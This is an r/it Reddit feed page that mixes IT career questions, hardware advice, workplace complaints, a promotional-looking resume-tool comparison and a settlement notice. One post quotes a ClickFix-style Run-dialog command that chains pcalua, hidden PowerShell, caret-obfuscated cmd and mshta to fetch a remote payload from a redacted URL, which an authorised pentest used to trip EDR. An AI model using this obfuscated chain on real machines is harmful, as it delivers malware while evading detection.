r/it

▲ 7 r/it

How would you begin an IT career again?

After working many jobs all of which a high schooler could have worked I decided that I should start looking for a real career. After a bit of research I landed on IT because it seems like you can learn from home on your own time which is helpful since I can’t stop working. My question to everyone is if you had to start from nothing on a low budget what would be your first steps to breaking in or would you look for a career in a different field.

reddit.com
▲ 14 r/it

What do you think? Is IT a really stressful field to be in?

How stressed are you being in IT? What do you do? How’s your management? What’s expected of you and is it realistic?

reddit.com
u/Love2FlyBalloons — 1 day ago
▲ 1 r/it

Resume Feedback – Tier 1 Help Desk Trying to Move Up in IT/Cybersecurity

Currently working as a Tier 1 help desk in an enterprise banking environment and studying cybersecurity. I’ve been rebuilding my resume because I’m trying to eventually move into either SOC, IAM, or a higher level IT support role.

u/Aggravating_Art203 — 1 day ago
▲ 276 r/it

Title: Someone actually pasted THIS into Windows Run and CrowdStrike went absolutely nuts

​

Had an interesting one today.

CrowdStrike flagged a user executing this through the Windows Run dialog:

pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/[REDACTED]' -Wi Hi"

Which basically unwraps into:

Explorer → pcalua.exe → PowerShell → cmd.exe → mshta.exe → remote payload

The m^s^h^t^a and h^t^t^p^s obfuscation was especially nice. CMD strips the carets, so it ends up executing mshta against the remote URL while PowerShell launches the CMD window hidden.

CrowdStrike also caught the RunMRU registry activity, which made it pretty obvious the command had been pasted into Win+R — classic ClickFix behaviour.

At first glance I'm thinking:

"Well, someone's having a very bad day."

Then came the plot twist:

It was our auditors running an authorised pentest. 😂

Pretty cool seeing the whole thing light up in Falcon though. It detected both the suspicious copy/paste behaviour and the LOLBin execution chain.

For the security guys here

Would your endpoint controls actually prevent this chain, or would you mostly rely on EDR detection once pcalua → PowerShell → cmd → mshta starts happening?

Also curious how many environments have outright blocked mshta.exe at this point.

reddit.com
u/International-Past31 — 2 days ago
▲ 98 r/it+103 crossposts

I Tried ChatGPT to Fix My Resume. Here’s Why It Missed the Point.

Comparing https://resume.zoevera.com against https://chatgpt.com

And what a purpose-built ATS checker caught that GPT-4 didn’t.

Let me be upfront: I use ChatGPT for everything. Code reviews, draft emails, explaining stack traces at 2am. It’s genuinely useful. So when I needed to tailor my resume for a senior backend role, my first instinct was to open a chat window.

That was three weeks ago. Here’s what I learned.

What ChatGPT actually does well

Ask ChatGPT to “improve my resume” and it will:

  • Clean up passive voice (“responsible for” → “led”)
  • Suggest stronger action verbs
  • Add structure and formatting consistency
  • Rewrite vague bullets into something that sounds more impressive

For general writing quality, it’s genuinely good. If your resume reads like it was written by someone who hasn’t slept in 48 hours, ChatGPT will fix that.

What ChatGPT fundamentally cannot do

Here’s the problem: ChatGPT doesn’t know what job you’re applying for.

You can paste the job description into the prompt, sure. But there’s no mechanism for it to:

  1. Score your resume against that specific JD — it has no concept of a match percentage
  2. Identify which keywords are present vs. missing — it will suggest improvements but won’t systematically audit keyword coverage
  3. Know how Applicant Tracking Systems parse text — it will rewrite content without knowing whether an ATS will ever see it

ATS filters work on keyword frequency and placement. A resume that reads beautifully to a human can score 40% on an ATS if the right terms aren’t in the right sections. ChatGPT optimizes for human readers. ATS systems are not human readers.

I ran a test. Same resume, same job description (Backend Engineer, Node.js/AWS stack). I gave ChatGPT the full JD and asked it to optimize my resume for ATS.

The output was well-written. It added “microservices” and “REST APIs” in a few places. But it missed:

  • “AWS Lambda” — mentioned 4 times in the JD, absent from my resume after the rewrite
  • “CI/CD pipeline” — appeared in the required skills section, never added
  • The Projects section — ChatGPT rewrote my experience bullets but left the Projects section untouched, which is where most of my relevant backend work lived

When I ran the same resume through resume.zoevera.com, it flagged all three gaps explicitly, with section-level attribution. The ATS match score went from 54% to 81% after applying the suggested changes.

The core difference: diagnostic vs. generative

ChatGPT is a generative tool. It produces new text. It’s very good at that.

An ATS checker is a diagnostic tool first. It measures the gap between your resume and a specific job description, then tells you exactly what’s missing. The rewrite comes second — and it’s grounded in what was actually identified as absent, not what the model thinks sounds better.

This distinction matters because:

ChatGPT hallucinates improvements. It will add metrics you never achieved (“improved system performance by 35%”), use terminology that
sounds right but wasn’t in the JD, and rewrite bullets that didn’t need rewriting while leaving critical gaps untouched. Every line needsfact-checking.

A purpose-built tool works from the actual gap. The keywords it adds are the ones the JD asked for. The sections it flags are the ones the ATS will score. The output is closer to submission-ready.

A practical workflow

These tools aren’t mutually exclusive. The best result I got came from using both in sequence:

  1. ATS checker first: identify the keyword gaps and get a scored rewrite that closes them
  2. ChatGPT second: use it to polish tone, tighten sentences, and clean up anything that sounds mechanical

The ATS checker handles precision. ChatGPT handles prose quality. Neither does both well alone.

The cost argument

ChatGPT Plus is $20/month. If you’re actively job searching, that’s a fixed overhead whether you use it or not.

Most people search for jobs in windows — a few weeks of active applications, then nothing for months. A per-session model makes more
sense: pay when you need it, nothing when you don’t. ZoeVera’s pricing works that way — free analysis, one-time payment for the full
rewrite, no subscription.

For a developer audience specifically: if you’re applying to 10–15 roles over two weeks, you’re not optimizing resumes 365 days a year. The math on a monthly subscription doesn’t work.

What I’d actually recommend

  • If you just need better writing: ChatGPT is fine and you already have it
  • If you’re applying to roles where ATS filtering is real (any company using Workday, Greenhouse, Lever, iCIMS): use a dedicated ATS checker first, then polish with ChatGPT
  • If you’re a developer and haven’t thought about this: your resume probably uses technical jargon that means something to you and nothing to an ATS keyword parser. “Built scalable backend” is not the same as “developed microservices architecture using Node.js and AWS ambda” — even if the underlying work is identical

The ATS doesn’t know what you meant. It only knows what you wrote.

Tested against a real Backend Engineer job description. Tools used: ChatGPT GPT-4o, https://resume.zoevera.com. June 2026.

u/Enough_Charge2845 — 2 days ago
▲ 5 r/it

Engineer vs Administrator

I know there will be some overlap, but generally speaking, what’s the difference in abilities/role between Sys/App Engineers and Sys Admins?

reddit.com
u/Organic24K — 1 day ago
🔥 Hot ▲ 6.9k r/it+5 crossposts

New record in China, 15.947 drones at the same time

u/NAStrahl — 3 days ago
▲ 0 r/it

Where is the demand for AI professionals? The answer is where there are computers but no AI in it.

All business will adopt AI like they adopted computers but it may be slow in some industries and fast in others. That is where AI professionals will be needed. However they will have limited budget for same and would only pay wrt their organisational policies.

India's IT industry operates on a flawed model of labor arbitrage. It was never resilient and is bound to collapse. However the demand for software and AI remains high and will increase as business owners will understand its value. This will create opportunities for AI entrepreneurs and professionals in Non Tech Industries where the advancements have not reached.

reddit.com
u/Maleficent_Mess6445 — 1 day ago
▲ 41 r/it

PIN numbers for IT security

Maybe I'm old but a pin number does NOT have letters or symbols in it. It is a pin NUMBER. A series of numbers to secure your device. If I am forced to have upper case and lower case letters and symbols in my pin, it is no longer a pin. It is a password. I now have two passwords. My agency is forcing this on us and I am livid. I will die on this hill.

reddit.com
u/OLVANstorm — 2 days ago
▲ 1 r/it+1 crossposts

Registrating Sophos Licence

Hi there, I‘m an it-freelancer. One of my customers needs a firewall and I offered him a Sophos XGS108 with 5 years standard protection. My Sophos dealer now asked for the name and other data of my customer for a personaliced offer and I would have to register the firewall on my customer. I don’t want to give data of my customer neither to the Sophos dealer nor to Sophos, because I think after 5 years they make a new contract with my customer without me in the middle. Any thoughts to that? Need some advice. Thx

reddit.com
u/Phosphatfrei — 1 day ago
▲ 4 r/it

Type of computer for IT degree

I am going to school for cyber security.

I currently have a mac book pro, but definitely needing to upgrade.

I love the lenovo yoga 2 in 1, but that's more b scatter if the look of it.

I think the ThinkPad p14s Gen 7 AMFlD mobile workstation would be better, but i hate the look of it.

Does anyone know anything about the ThinkPad and is it with it?

reddit.com
u/Defiant_habit696 — 2 days ago
▲ 6 r/it

best laptop for it students? What should I look for?

I’m starting IT studies and need to get a laptop that can handle programming, virtual machines, databases, and the usual school work without being a pain to carry around. I’ve been comparing a few models but I’m not really sure which specs matter most for IT students. Is there a particular laptop or hardware setup you’d recommend, and are there any specs I should avoid going too low on?

Thanks for any advice, I really appreciate it.

reddit.com
u/AmucheMcconnaughie — 2 days ago
▲ 155 r/it+95 crossposts

Most people who followed $CYDY remember March 30, 2021. The FDA publicly stated that CytoDyn's claims about leronlimab were "misleading and not supported by the data", no benefit was shown in COVID-19 treatment trials. The stock dropped 25%+ that day.

What happened afterward was a class action lawsuit covering investors who held $CYDY between March 27, 2020 and March 30, 2022.

A $500,000 settlement has been reached and terms are now submitted to the court for approval.

Who qualifies?

Anyone who held $CYDY during the class period and suffered losses from the alleged misrepresentations about leronlimab's effectiveness for HIV and COVID-19.

Can I still apply?

Yes, you can submit your application now and it will be processed once claims filing officially opens after court approval.

If you were damaged by this don't forget to check your eligibility. GL!

u/JuniorCharge4571 — 3 days ago
▲ 61 r/it

I have a company laptop. Lost my job 2 years ago. They didnt ask for it back.

Kind of a bitter split, They took my phone so I didnt have one for a little bit. I am not sure they even know I still have it. Never contacted them. Program called SentinelOne looks like it still may be reporting. Didnt turn it on for over 1 year. Now use it for personal use, but it is so slow I want to factory reset it. Should I? Or should I try to contact them regarding it? I am sure they arent missing it. But dont want them to be petty and see its reset and then come after me? You'd think theyd still see it online when I use it personally? They've not contacted me or vice versa.. idk how much trouble id get in if any?

reddit.com
u/Merely-a-Flesh-Wound — 3 days ago
▲ 9 r/it

How did you leverage your people skills in your IT career?

What the title says. Curious if people sought specific roles or if they were promoted due to their people skills, if they enjoyed a less technical role, and how people skills overall impacted their career.

reddit.com
u/Additional_Mud_2755 — 2 days ago
▲ 2 r/it

Should I take a higher paying position risking workplace comfort

I’m a 25-year-old .NET developer trying to decide between staying at my current job or taking an offer from a large oil company, one of the largest in the world. I’d really appreciate some outside perspectives, especially from people who have made a similar decision.

Some more background: i interned with this company, they have an Azure development environment, scrum agile, up to date on things whereas current company is super small dev team, lot of flexibility on the code i wrote (no need for 100 approvals, unit testing, 100 meetings, etc), and we host locally (no cloud). I mention this cause I’m kind of scared to enter an environment that’s slightly more stress.

Current job:
$96k salary after my employer countered
15% employer retirement contribution
Free health insurance
Same vacation as the new offer
25-minute shorter commute
I genuinely love my boss and coworkers
I’m very comfortable with the work and company
Good work-life balance
Not a ton of advancement opportunities, although I’m not necessarily obsessed with climbing the corporate ladder
Large oil company offer:
$98k base
15% annual cash bonus
7% pension contribution
7% 401(k) match
Health insurance would cost me roughly $3–4k/year for family coverage, depending on the plan
One day a week working from home
Same vacation
Larger company with more potential career advancement
Longer commute on the four days I’d be in the office
I obviously don’t know yet what the boss/team/work environment will be like
Financially, the large oil company seems clearly better once I account for the bonus, pension and 401(k), but the difference isn’t necessarily life-changing right now.
My wife is also finishing her path to becoming a nurse practitioner and should be making significantly more money in about two years. We don’t have a ton of debt, and our long-term goals are to build a nice house, retire early if possible, and potentially have a small lake house someday.
At the same time, family time and quality of life are extremely important to me. I have a young daughter, and there is something really valuable about genuinely enjoying where I work and having a boss I really like.
I’m struggling with whether I should:

  1. Take the large oil company offer for the better long-term compensation, retirement benefits and career growth, knowing I could potentially use the experience to increase my earning power over the next 5–10 years.
    OR
  2. Stay at my current company, take the $96k + 15% retirement + free healthcare, and prioritize the job satisfaction, shorter commute, people I like working with and overall quality of life.
    For those of you with more career experience:
    What would you do in my situation?
    Would you take the large oil company offer, or is the quality-of-life difference enough that you’d stay? And are there any factors I’m overlooking that I should be considering before making the decision?
reddit.com
u/DonutAccomplished229 — 2 days ago
▲ 564 r/it+3 crossposts

AI is generating so much content that human made content is becoming a luxury product

A school district has signed a deal for a humanoid robot teacher for the future , flock surveillance cameras are getting cancelled across 85 contracts in 28 states and a mexican startup is selling Evs for $8.5k (not even silicon valley cant match that) and guess what, in the advertising industry something totally diff than this wave is happening,brands are paying a premium for proof that a human made something (who could have imagined)

the ugc advertising market that consists of short videos of real people reviewing products(sorry for mansplaining) has been flooded with ai gen content with synthetic avatars, ai voiceovers and artificially generated testimonials that are technically indistinguishable from REAL people but it still feel off in ways we register it without being able to articulate(in short slop),so now platforms like tiktok and meta are now requiring disclosure labels on ai generated ad content and brands that built their entire creative pipeline on ai avatars are watching engagement rates drop.

And thankfully instead of users adapting to ai content, brands are moving back toward human creators and paying more for the privilege,now there are companies like Icon that are marketing their product as no ai and 100% real as a premium differentiator (ar almost same price as sloppy content) coz the human made label is becoming a quality signal now

If we think about it ,it basically the the historical parallel ,like the industrial revolution made mass produced goods so cheap and avl that handmade goods became luxury items, every time a technology makes a category of output infinitely abundant, the scarce human version of that output increases in perceived value.

and imo we are in the early stages of that dynamic playing out across every creative category simultaneously ,idk what happens to the economic and cultural value of the human version when the ai version is everywhere.

does human made content become a permanent premium category the way handmade goods did, or does the distinction eventually stop mattering as ai quality becomes indistinguishable?

reddit.com
u/Admirable_Staff_1003 — 3 days ago
▲ 0 r/it

What PDF software problem creates the most tickets?

For IT/admin folks: what PDF-related issue do users keep bringing back no matter how many times it gets “fixed”?

Printing? Forms? Default app settings? Signatures? Huge files? Plugins? Updates? Something breaking after a new version?

PDFs feel boring until they become everyone’s problem at once.

reddit.com
u/foxitofficial — 2 days ago